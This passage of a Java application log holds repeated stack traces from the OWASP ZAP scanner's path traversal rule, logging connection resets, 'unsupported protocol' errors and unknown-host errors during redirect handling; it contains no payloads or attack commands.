for Path Traversal: Connection reset java.net.SocketException: Connection reset at java.net.SocketInputStream.read(SocketInputStream.java:196) at java.net.SocketInputStream.read(SocketInputStream.java:122) at java.io.BufferedInputStream.fill(BufferedInputStream.java:235) at java.io.BufferedInputStream.read(BufferedInputStream.java:254) at org.apache.commons.httpclient.HttpParser.readRawLine(HttpParser.java:78) at org.apache.commons.httpclient.HttpParser.readLine(HttpParser.java:106) at org.apache.commons.httpclient.HttpConnection.readLine(HttpConnection.java:1116) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.readLine(MultiThreadedHttpConnectionManager.java:1413) at org.apache.commons.httpclient.HttpMethodBase.readStatusLine(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.readResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.execute(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:329) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 3988280 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4000988 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4035340 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4035340 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4035540 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4035542 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: c java.net.UnknownHostException: c at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4035741 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4035741 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4035950 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: c java.net.UnknownHostException: c at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4035954 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4036153 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: c java.net.UnknownHostException: c at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4036154 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: c java.net.UnknownHostException: c at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4036355 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4036355 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: c java.net.UnknownHostException: c at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 